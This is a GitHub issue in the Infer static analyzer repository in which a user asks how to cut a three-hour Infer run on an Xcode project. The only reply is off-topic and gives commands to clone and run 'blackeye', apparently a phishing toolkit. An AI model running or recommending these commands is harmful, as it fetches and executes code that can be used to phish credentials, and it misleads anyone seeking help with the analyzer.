facebook / infer

A static analyzer for Java, C, C++, and Objective-C
http://fbinfer.com/
MIT License
14.88k stars 2k forks source link

How to reduce the Infer time for my Project? #1653

Open blooming2017 opened 2 years ago

blooming2017 commented 2 years ago

1,infer version:V1.1.0 2,macOS Catalina 10.15.3 3,command : infer --keep-going -- xcodebuild -workspace /Users/Desktop/MyProject.xcworkspace -scheme MyProject. -configuration Debug -arch x86_64 ONLY_ACTIVE=NO VALID_ARCHS=x86_64 -UseModernBuildSystem=1 4,It cost one hour to execute Infer commoan a week ago, but now it costs 3 hours without much codes changed in my project.How to reduce the Infer time for my Project? Thank you.

Sohag87 commented 1 year ago

git clone https://github.com/thelinuxchoice/blackeye cd blackeye bash blackeye.sh